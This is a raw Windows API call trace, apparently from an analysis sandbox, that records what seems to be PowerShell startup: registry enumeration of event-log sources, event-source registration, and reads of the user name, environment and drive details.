	[0784.186] RegOpenKeyExW (in: hKey=0x338, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ecfc8 | out: phkResult=0x1ecfc8*=0x340) returned 0x0
	[0784.186] RegOpenKeyExW (in: hKey=0x340, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ecfc8 | out: phkResult=0x1ecfc8*=0x0) returned 0x2
	[0784.186] RegOpenKeyExW (in: hKey=0x338, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ecfc8 | out: phkResult=0x1ecfc8*=0x344) returned 0x0
	[0784.186] RegOpenKeyExW (in: hKey=0x344, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ecfc8 | out: phkResult=0x1ecfc8*=0x0) returned 0x2
	[0784.186] RegOpenKeyExW (in: hKey=0x338, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ecfc8 | out: phkResult=0x1ecfc8*=0x348) returned 0x0
	[0784.186] RegOpenKeyExW (in: hKey=0x348, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ecfc8 | out: phkResult=0x1ecfc8*=0x0) returned 0x2
	[0784.187] RegOpenKeyExW (in: hKey=0x338, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ecfc8 | out: phkResult=0x1ecfc8*=0x34c) returned 0x0
	[0784.187] RegOpenKeyExW (in: hKey=0x34c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ecfc8 | out: phkResult=0x1ecfc8*=0x0) returned 0x2
	[0784.187] RegOpenKeyExW (in: hKey=0x338, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ecfc8 | out: phkResult=0x1ecfc8*=0x350) returned 0x0
	[0784.187] RegOpenKeyExW (in: hKey=0x350, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ecfc8 | out: phkResult=0x1ecfc8*=0x0) returned 0x2
	[0784.187] RegOpenKeyExW (in: hKey=0x338, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ecfc8 | out: phkResult=0x1ecfc8*=0x354) returned 0x0
	[0784.187] RegOpenKeyExW (in: hKey=0x354, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ecfc8 | out: phkResult=0x1ecfc8*=0x0) returned 0x2
	[0784.187] RegOpenKeyExW (in: hKey=0x338, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ecfc8 | out: phkResult=0x1ecfc8*=0x358) returned 0x0
	[0784.187] RegOpenKeyExW (in: hKey=0x358, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ecfc8 | out: phkResult=0x1ecfc8*=0x0) returned 0x2
	[0784.187] RegOpenKeyExW (in: hKey=0x338, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ecfc8 | out: phkResult=0x1ecfc8*=0x35c) returned 0x0
	[0784.188] RegOpenKeyExW (in: hKey=0x35c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ecfc8 | out: phkResult=0x1ecfc8*=0x360) returned 0x0
	[0784.188] RegCloseKey (hKey=0x360) returned 0x0
	[0784.188] RegCloseKey (hKey=0x338) returned 0x0
	[0784.188] RegCloseKey (hKey=0x35c) returned 0x0
	[0784.189] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ecf68 | out: phkResult=0x1ecf68*=0x35c) returned 0x0
	[0784.189] RegQueryInfoKeyW (in: hKey=0x35c, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1ecedc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1eced8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1ecedc*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1eced8*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0784.189] CoTaskMemFree (pv=0x0) 
	[0784.189] CoTaskMemAlloc (cb=0x204) returned 0x382120
	[0784.189] RegEnumKeyExW (in: hKey=0x35c, dwIndex=0x0, lpName=0x382120, lpcchName=0x1ecf68, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x1ecf68, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0784.189] CoTaskMemFree (pv=0x382120) 
	[0784.190] CoTaskMemFree (pv=0x0) 
	[0784.190] CoTaskMemAlloc (cb=0x204) returned 0x382120
	[0784.190] RegEnumKeyExW (in: hKey=0x35c, dwIndex=0x1, lpName=0x382120, lpcchName=0x1ecf68, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x1ecf68, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0784.190] CoTaskMemFree (pv=0x382120) 
	[0784.190] CoTaskMemFree (pv=0x0) 
	[0784.190] CoTaskMemAlloc (cb=0x204) returned 0x382120
	[0784.190] RegEnumKeyExW (in: hKey=0x35c, dwIndex=0x2, lpName=0x382120, lpcchName=0x1ecf68, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x1ecf68, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0784.190] CoTaskMemFree (pv=0x382120) 
	[0784.190] CoTaskMemFree (pv=0x0) 
	[0784.190] CoTaskMemAlloc (cb=0x204) returned 0x382120
	[0784.190] RegEnumKeyExW (in: hKey=0x35c, dwIndex=0x3, lpName=0x382120, lpcchName=0x1ecf68, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x1ecf68, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0784.190] CoTaskMemFree (pv=0x382120) 
	[0784.190] CoTaskMemFree (pv=0x0) 
	[0784.190] CoTaskMemAlloc (cb=0x204) returned 0x382120
	[0784.190] RegEnumKeyExW (in: hKey=0x35c, dwIndex=0x4, lpName=0x382120, lpcchName=0x1ecf68, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x1ecf68, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0784.191] CoTaskMemFree (pv=0x382120) 
	[0784.191] CoTaskMemFree (pv=0x0) 
	[0784.191] CoTaskMemAlloc (cb=0x204) returned 0x382120
	[0784.191] RegEnumKeyExW (in: hKey=0x35c, dwIndex=0x5, lpName=0x382120, lpcchName=0x1ecf68, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x1ecf68, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0784.191] CoTaskMemFree (pv=0x382120) 
	[0784.191] CoTaskMemFree (pv=0x0) 
	[0784.191] CoTaskMemAlloc (cb=0x204) returned 0x382120
	[0784.191] RegEnumKeyExW (in: hKey=0x35c, dwIndex=0x6, lpName=0x382120, lpcchName=0x1ecf68, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x1ecf68, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0784.191] CoTaskMemFree (pv=0x382120) 
	[0784.191] CoTaskMemFree (pv=0x0) 
	[0784.191] CoTaskMemAlloc (cb=0x204) returned 0x382120
	[0784.191] RegEnumKeyExW (in: hKey=0x35c, dwIndex=0x7, lpName=0x382120, lpcchName=0x1ecf68, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x1ecf68, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0784.191] CoTaskMemFree (pv=0x382120) 
	[0784.191] CoTaskMemFree (pv=0x0) 
	[0784.191] CoTaskMemAlloc (cb=0x204) returned 0x382120
	[0784.191] RegEnumKeyExW (in: hKey=0x35c, dwIndex=0x8, lpName=0x382120, lpcchName=0x1ecf68, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x1ecf68, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0784.192] CoTaskMemFree (pv=0x382120) 
	[0784.192] CoTaskMemFree (pv=0x0) 
	[0784.192] RegOpenKeyExW (in: hKey=0x35c, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ecfc8 | out: phkResult=0x1ecfc8*=0x338) returned 0x0
	[0784.192] RegOpenKeyExW (in: hKey=0x338, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ecfc8 | out: phkResult=0x1ecfc8*=0x0) returned 0x2
	[0784.192] RegOpenKeyExW (in: hKey=0x35c, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ecfc8 | out: phkResult=0x1ecfc8*=0x360) returned 0x0
	[0784.192] RegOpenKeyExW (in: hKey=0x360, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ecfc8 | out: phkResult=0x1ecfc8*=0x0) returned 0x2
	[0784.192] RegOpenKeyExW (in: hKey=0x35c, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ecfc8 | out: phkResult=0x1ecfc8*=0x364) returned 0x0
	[0784.192] RegOpenKeyExW (in: hKey=0x364, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ecfc8 | out: phkResult=0x1ecfc8*=0x0) returned 0x2
	[0784.192] RegOpenKeyExW (in: hKey=0x35c, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ecfc8 | out: phkResult=0x1ecfc8*=0x368) returned 0x0
	[0784.192] RegOpenKeyExW (in: hKey=0x368, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ecfc8 | out: phkResult=0x1ecfc8*=0x0) returned 0x2
	[0784.193] RegOpenKeyExW (in: hKey=0x35c, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ecfc8 | out: phkResult=0x1ecfc8*=0x36c) returned 0x0
	[0784.193] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ecfc8 | out: phkResult=0x1ecfc8*=0x0) returned 0x2
	[0784.193] RegOpenKeyExW (in: hKey=0x35c, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ecfc8 | out: phkResult=0x1ecfc8*=0x370) returned 0x0
	[0784.193] RegOpenKeyExW (in: hKey=0x370, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ecfc8 | out: phkResult=0x1ecfc8*=0x0) returned 0x2
	[0784.193] RegOpenKeyExW (in: hKey=0x35c, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ecfc8 | out: phkResult=0x1ecfc8*=0x374) returned 0x0
	[0784.193] RegOpenKeyExW (in: hKey=0x374, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ecfc8 | out: phkResult=0x1ecfc8*=0x0) returned 0x2
	[0784.193] RegOpenKeyExW (in: hKey=0x35c, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ecfc8 | out: phkResult=0x1ecfc8*=0x378) returned 0x0
	[0784.193] RegOpenKeyExW (in: hKey=0x378, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ecfc8 | out: phkResult=0x1ecfc8*=0x0) returned 0x2
	[0784.194] RegOpenKeyExW (in: hKey=0x35c, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ecfc8 | out: phkResult=0x1ecfc8*=0x37c) returned 0x0
	[0784.194] RegOpenKeyExW (in: hKey=0x37c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ecfc8 | out: phkResult=0x1ecfc8*=0x380) returned 0x0
	[0784.194] RegCloseKey (hKey=0x380) returned 0x0
	[0784.194] RegCloseKey (hKey=0x35c) returned 0x0
	[0784.194] RegCloseKey (hKey=0x37c) returned 0x0
	[0784.195] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ecf38 | out: phkResult=0x1ecf38*=0x37c) returned 0x0
	[0784.195] RegQueryInfoKeyW (in: hKey=0x37c, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1eceac, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1ecea8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1eceac*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1ecea8*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0784.196] CoTaskMemFree (pv=0x0) 
	[0784.196] CoTaskMemAlloc (cb=0x204) returned 0x382120
	[0784.196] RegEnumKeyExW (in: hKey=0x37c, dwIndex=0x0, lpName=0x382120, lpcchName=0x1ecf38, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x1ecf38, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0784.196] CoTaskMemFree (pv=0x382120) 
	[0784.196] CoTaskMemFree (pv=0x0) 
	[0784.196] CoTaskMemAlloc (cb=0x204) returned 0x382120
	[0784.196] RegEnumKeyExW (in: hKey=0x37c, dwIndex=0x1, lpName=0x382120, lpcchName=0x1ecf38, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x1ecf38, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0784.196] CoTaskMemFree (pv=0x382120) 
	[0784.196] CoTaskMemFree (pv=0x0) 
	[0784.196] CoTaskMemAlloc (cb=0x204) returned 0x382120
	[0784.196] RegEnumKeyExW (in: hKey=0x37c, dwIndex=0x2, lpName=0x382120, lpcchName=0x1ecf38, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x1ecf38, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0784.196] CoTaskMemFree (pv=0x382120) 
	[0784.196] CoTaskMemFree (pv=0x0) 
	[0784.196] CoTaskMemAlloc (cb=0x204) returned 0x382120
	[0784.196] RegEnumKeyExW (in: hKey=0x37c, dwIndex=0x3, lpName=0x382120, lpcchName=0x1ecf38, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x1ecf38, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0784.196] CoTaskMemFree (pv=0x382120) 
	[0784.197] CoTaskMemFree (pv=0x0) 
	[0784.197] CoTaskMemAlloc (cb=0x204) returned 0x382120
	[0784.197] RegEnumKeyExW (in: hKey=0x37c, dwIndex=0x4, lpName=0x382120, lpcchName=0x1ecf38, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x1ecf38, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0784.197] CoTaskMemFree (pv=0x382120) 
	[0784.197] CoTaskMemFree (pv=0x0) 
	[0784.197] CoTaskMemAlloc (cb=0x204) returned 0x382120
	[0784.197] RegEnumKeyExW (in: hKey=0x37c, dwIndex=0x5, lpName=0x382120, lpcchName=0x1ecf38, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x1ecf38, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0784.197] CoTaskMemFree (pv=0x382120) 
	[0784.197] CoTaskMemFree (pv=0x0) 
	[0784.197] CoTaskMemAlloc (cb=0x204) returned 0x382120
	[0784.197] RegEnumKeyExW (in: hKey=0x37c, dwIndex=0x6, lpName=0x382120, lpcchName=0x1ecf38, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x1ecf38, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0784.197] CoTaskMemFree (pv=0x382120) 
	[0784.197] CoTaskMemFree (pv=0x0) 
	[0784.197] CoTaskMemAlloc (cb=0x204) returned 0x382120
	[0784.197] RegEnumKeyExW (in: hKey=0x37c, dwIndex=0x7, lpName=0x382120, lpcchName=0x1ecf38, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x1ecf38, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0784.198] CoTaskMemFree (pv=0x382120) 
	[0784.198] CoTaskMemFree (pv=0x0) 
	[0784.198] CoTaskMemAlloc (cb=0x204) returned 0x382120
	[0784.198] RegEnumKeyExW (in: hKey=0x37c, dwIndex=0x8, lpName=0x382120, lpcchName=0x1ecf38, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x1ecf38, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0784.198] CoTaskMemFree (pv=0x382120) 
	[0784.198] CoTaskMemFree (pv=0x0) 
	[0784.198] RegOpenKeyExW (in: hKey=0x37c, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ecf98 | out: phkResult=0x1ecf98*=0x35c) returned 0x0
	[0784.198] RegOpenKeyExW (in: hKey=0x35c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ecf98 | out: phkResult=0x1ecf98*=0x0) returned 0x2
	[0784.198] RegOpenKeyExW (in: hKey=0x37c, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ecf98 | out: phkResult=0x1ecf98*=0x380) returned 0x0
	[0784.198] RegOpenKeyExW (in: hKey=0x380, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ecf98 | out: phkResult=0x1ecf98*=0x0) returned 0x2
	[0784.199] RegOpenKeyExW (in: hKey=0x37c, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ecf98 | out: phkResult=0x1ecf98*=0x384) returned 0x0
	[0784.199] RegOpenKeyExW (in: hKey=0x384, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ecf98 | out: phkResult=0x1ecf98*=0x0) returned 0x2
	[0784.199] RegOpenKeyExW (in: hKey=0x37c, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ecf98 | out: phkResult=0x1ecf98*=0x388) returned 0x0
	[0784.199] RegOpenKeyExW (in: hKey=0x388, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ecf98 | out: phkResult=0x1ecf98*=0x0) returned 0x2
	[0784.199] RegOpenKeyExW (in: hKey=0x37c, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ecf98 | out: phkResult=0x1ecf98*=0x38c) returned 0x0
	[0784.968] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ecf98 | out: phkResult=0x1ecf98*=0x0) returned 0x2
	[0784.968] RegOpenKeyExW (in: hKey=0x37c, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ecf98 | out: phkResult=0x1ecf98*=0x390) returned 0x0
	[0784.968] RegOpenKeyExW (in: hKey=0x390, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ecf98 | out: phkResult=0x1ecf98*=0x0) returned 0x2
	[0784.969] RegOpenKeyExW (in: hKey=0x37c, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ecf98 | out: phkResult=0x1ecf98*=0x394) returned 0x0
	[0784.969] RegOpenKeyExW (in: hKey=0x394, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ecf98 | out: phkResult=0x1ecf98*=0x0) returned 0x2
	[0784.969] RegOpenKeyExW (in: hKey=0x37c, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ecf98 | out: phkResult=0x1ecf98*=0x398) returned 0x0
	[0784.969] RegOpenKeyExW (in: hKey=0x398, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ecf98 | out: phkResult=0x1ecf98*=0x0) returned 0x2
	[0784.969] RegOpenKeyExW (in: hKey=0x37c, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ecf98 | out: phkResult=0x1ecf98*=0x39c) returned 0x0
	[0784.969] RegOpenKeyExW (in: hKey=0x39c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ecf98 | out: phkResult=0x1ecf98*=0x3a0) returned 0x0
	[0784.970] RegCloseKey (hKey=0x3a0) returned 0x0
	[0784.970] RegCloseKey (hKey=0x37c) returned 0x0
	[0784.970] RegCloseKey (hKey=0x39c) returned 0x0
	[0784.973] RegisterEventSourceW (lpUNCServerName=".", lpSourceName="PowerShell") returned 0x1b840008
	[0785.044] ReportEventW (hEventLog=0x1b840008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2d06cb8*="WSMan", lpRawData=0x2d06a28) returned 1
	[0785.053] CoTaskMemAlloc (cb=0x104) returned 0x33a4f0
	[0785.053] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x33a4f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0785.053] CoTaskMemFree (pv=0x33a4f0) 
	[0785.054] CoTaskMemAlloc (cb=0x804) returned 0x1b3f91e0
	[0785.054] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b3f91e0, nSize=0x1ed228 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x1ed228) returned 0x1
	[0785.055] CoTaskMemFree (pv=0x1b3f91e0) 
	[0785.055] CoTaskMemAlloc (cb=0x204) returned 0x382120
	[0785.055] GetUserNameW (in: lpBuffer=0x382120, pcbBuffer=0x1ed268 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x1ed268) returned 1
	[0785.055] CoTaskMemFree (pv=0x382120) 
	[0785.055] ReportEventW (hEventLog=0x1b840008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2d0c1f0*="Alias", lpRawData=0x2d0bf80) returned 1
	[0785.063] CoTaskMemAlloc (cb=0x104) returned 0x33a4f0
	[0785.063] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x33a4f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0785.064] CoTaskMemFree (pv=0x33a4f0) 
	[0785.064] CoTaskMemAlloc (cb=0x804) returned 0x1b3f91e0
	[0785.064] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b3f91e0, nSize=0x1ed228 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x1ed228) returned 0x1
	[0785.065] CoTaskMemFree (pv=0x1b3f91e0) 
	[0785.065] CoTaskMemAlloc (cb=0x204) returned 0x382120
	[0785.065] GetUserNameW (in: lpBuffer=0x382120, pcbBuffer=0x1ed268 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x1ed268) returned 1
	[0785.065] CoTaskMemFree (pv=0x382120) 
	[0785.065] ReportEventW (hEventLog=0x1b840008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2d117e8*="Environment", lpRawData=0x2d11578) returned 1
	[0785.080] CoTaskMemAlloc (cb=0x104) returned 0x33a4f0
	[0785.080] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x33a4f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0785.080] CoTaskMemFree (pv=0x33a4f0) 
	[0785.080] CoTaskMemAlloc (cb=0x104) returned 0x33a4f0
	[0785.080] GetEnvironmentVariableW (in: lpName="HOMEDRIVE", lpBuffer=0x33a4f0, nSize=0x80 | out: lpBuffer="C:") returned 0x2
	[0785.080] CoTaskMemFree (pv=0x33a4f0) 
	[0785.080] CoTaskMemAlloc (cb=0x104) returned 0x33a4f0
	[0785.081] GetEnvironmentVariableW (in: lpName="HOMEPATH", lpBuffer=0x33a4f0, nSize=0x80 | out: lpBuffer="\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1b
	[0785.081] CoTaskMemFree (pv=0x33a4f0) 
	[0785.081] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", nBufferLength=0x105, lpBuffer=0x1ecdd0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFilePart=0x0) returned 0x1d
	[0785.081] SetErrorMode (uMode=0x1) returned 0x1
	[0785.081] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz"), fInfoLevelId=0x0, lpFileInformation=0x1ecfe0 | out: lpFileInformation=0x1ecfe0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0785.081] SetErrorMode (uMode=0x1) returned 0x1
	[0785.082] GetLogicalDrives () returned 0x4
	[0785.082] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x1ecb40, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0785.083] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0785.083] SetErrorMode (uMode=0x1) returned 0x1
	[0785.083] CoTaskMemAlloc (cb=0x68) returned 0x1b3da290
	[0785.083] CoTaskMemAlloc (cb=0x68) returned 0x1b3da840
	[0785.083] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x1b3da290, nVolumeNameSize=0x32, lpVolumeSerialNumber=0x1ecfb0, lpMaximumComponentLength=0x1ecfac, lpFileSystemFlags=0x1ecfa8, lpFileSystemNameBuffer=0x1b3da840, nFileSystemNameSize=0x32 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x1ecfb0*=0x9c354b42, lpMaximumComponentLength=0x1ecfac*=0xff, lpFileSystemFlags=0x1ecfa8*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1
	[0785.084] CoTaskMemFree (pv=0x1b3da290) 
	[0785.084] CoTaskMemFree (pv=0x1b3da840) 
	[0785.084] SetErrorMode (uMode=0x1) returned 0x1
	[0785.084] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0785.084] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x1eccf0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0785.084] SetErrorMode (uMode=0x1) returned 0x1
	[0785.084] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x1ecf50 | out: lpFileInformation=0x1ecf50*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
